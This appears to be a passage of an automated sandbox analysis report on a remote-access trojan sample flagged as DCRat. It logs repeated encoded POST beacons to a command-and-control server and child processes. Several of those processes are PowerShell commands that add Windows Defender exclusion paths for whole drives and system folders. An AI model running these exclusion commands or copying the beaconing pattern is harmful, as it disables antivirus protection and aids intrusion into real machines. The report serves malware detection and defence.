                                                      Dec 13, 2024 14:34:36.657773018 CET1456OUTData Raw: 56 52 5d 5c 53 58 50 52 5b 5f 52 55 59 5a 57 5f 57 5f 5f 59 50 5c 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VR]\SXPR[_RUYZW_W__YP\VZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[![.<$&>'V<?7$?0S$(7?'7"3X%>@'(,$[' \,*
                                                      Dec 13, 2024 14:34:37.395003080 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:37.629379034 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 12 3c 07 05 1c 25 02 24 51 25 2d 07 5b 2b 3f 0b 13 2d 2c 28 10 33 1a 0d 1c 2a 23 3e 1c 3d 1a 0e 03 3d 30 3a 01 23 2c 38 54 3a 0c 2f 5f 0d 11 38 1d 23 3d 2a 58 2c 2d 09 10 29 10 3e 04 3f 11 39 11 29 10 24 10 27 3b 39 0d 32 03 03 0c 2b 07 3f 1f 3f 05 30 17 2c 2f 29 14 32 1f 2f 57 0d 1e 24 0c 2b 22 17 5e 22 28 3f 05 22 04 3e 07 3e 0a 22 10 22 39 27 1f 31 00 0c 02 27 2c 3c 54 21 30 28 1f 26 55 33 57 27 39 3f 11 24 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'<%$Q%-[+?-,(3*#>==0:#,8T:/_8#=*X,-)>?9)$';92+??0,/)2/W$+"^"(?">>""9'1',<T!0(&U3W'9?$/.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      94192.168.2.65008945.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:36.429466963 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:36.785378933 CET2568OUTData Raw: 53 52 5d 53 56 58 55 5e 5b 5f 52 55 59 50 57 58 57 53 5f 5a 50 59 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SR]SVXU^[_RUYPWXWS_ZPYVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-3.3<,%? %,8('7<2'>^-=$[' \,
                                                      Dec 13, 2024 14:34:37.515966892 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:37.749526978 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      95192.168.2.65009045.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:37.995688915 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:38.344762087 CET2568OUTData Raw: 53 50 58 59 53 5e 55 5e 5b 5f 52 55 59 5e 57 5e 57 59 5f 59 50 59 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SPXYS^U^[_RUY^W^WY_YPYVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^.,$$,<<\%,3$Z7_+7<3!4#&>5G'+;$[' \,
                                                      Dec 13, 2024 14:34:39.084698915 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:39.321382046 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:38 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      96192.168.2.65009145.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:39.566565990 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:39.922734976 CET2568OUTData Raw: 56 5b 58 58 56 55 50 52 5b 5f 52 55 59 58 57 53 57 52 5f 5e 50 5c 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[XXVUPR[_RUYXWSWR_^P\V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".+]03R<?;',,W$?'<'#_$]" <2=>0+--$[' \,"
                                                      Dec 13, 2024 14:34:40.652301073 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:40.889235973 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:40 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      97192.168.2.65009245.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:41.133598089 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:41.485294104 CET2568OUTData Raw: 53 50 5d 52 53 5c 55 5e 5b 5f 52 55 59 5c 57 52 57 5e 5f 5d 50 52 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SP]RS\U^[_RUY\WRW^_]PRVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!\-,4$$<(X0 U'?#?$$>""/^1>630_-=$[' \,2
                                                      Dec 13, 2024 14:34:42.218734980 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:42.811414957 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0
                                                      Dec 13, 2024 14:34:42.811474085 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      98192.168.2.65009345.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:42.811786890 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1428
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:43.157130003 CET1428OUTData Raw: 56 5a 58 5f 53 5c 55 5e 5b 5f 52 55 59 59 57 5b 57 53 5f 59 50 58 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VZX_S\U^[_RUYYW[WS_YPXV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!-3.3R?<$<<T'7]('+[$;9X413$>5'> /$[' \,
                                                      Dec 13, 2024 14:34:43.898303986 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:44.137187004 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 5e 2b 29 02 0a 32 2b 2c 1c 27 2e 3d 5f 29 11 0f 5f 3a 59 2c 13 26 37 23 1d 3c 30 2e 55 2a 37 2b 59 3e 20 26 00 21 2f 02 1c 39 36 2f 5f 0d 11 3b 06 37 2e 2a 5b 2c 5b 24 01 28 2e 25 17 28 59 21 5e 2a 00 33 01 30 02 22 1e 26 5b 26 51 28 2a 20 0d 3f 05 2c 5a 3a 02 3e 04 24 35 2f 57 0d 1e 27 51 3f 0c 3d 58 20 01 34 5f 21 13 25 59 2a 34 2a 57 36 3a 2b 5c 31 00 39 5e 31 12 27 0c 20 0d 2b 04 27 23 20 0a 24 07 27 55 25 3f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'^+)2+,'.=_)_:Y,&7#<0.U*7+Y> &!/96/_;7.*[,[$(.%(Y!^*30"&[&Q(* ?,Z:>$5/W'Q?=X 4_!%Y*4*W6:+\19^1' +'# $'U%?.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      99192.168.2.65009445.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:42.915612936 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:43.266520977 CET2568OUTData Raw: 56 5a 58 59 53 5c 50 53 5b 5f 52 55 59 5e 57 53 57 5a 5f 5f 50 5b 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VZXYS\PS[_RUY^WSWZ__P[V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!_9?3$>/<0<S0,((+'89^ 1/[1.5$ [8-$[' \,
                                                      Dec 13, 2024 14:34:44.001555920 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:44.241143942 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      100192.168.2.65009545.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:44.477386951 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:44.829190969 CET2568OUTData Raw: 53 55 58 5f 56 5e 55 52 5b 5f 52 55 59 5e 57 52 57 5e 5f 52 50 5b 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SUX_V^UR[_RUY^WRW^_RP[VX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[![:3\3.;<,$Y$#0/(*7'_'^7!#^2>>',$[' \,
                                                      Dec 13, 2024 14:34:45.576044083 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:45.809547901 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:45 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      101192.168.2.65009645.88.91.8980
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:34:46.109442949 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:46.454021931 CET2568OUTData Raw: 56 57 5d 58 56 5f 50 55 5b 5f 52 55 59 5e 57 5c 57 5a 5f 58 50 5c 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VW]XV_PU[_RUY^W\WZ_XP\VX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^.<?_03>,3300;(7<3!^4%=:0._/=$[' \,
                                                      Dec 13, 2024 14:34:47.194482088 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:47.429487944 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:47 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:08:32:06
                                                      Start date:13/12/2024
                                                      Path:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\CPNSQusnwC.exe"
                                                      Imagebase:0x9d0000
                                                      File size:2'670'080 bytes
                                                      MD5 hash:A26ED7DC21BC77F20C0251FA25738D02
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.2115602177.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:5
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:7
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:9
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:11
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:13
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:15
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
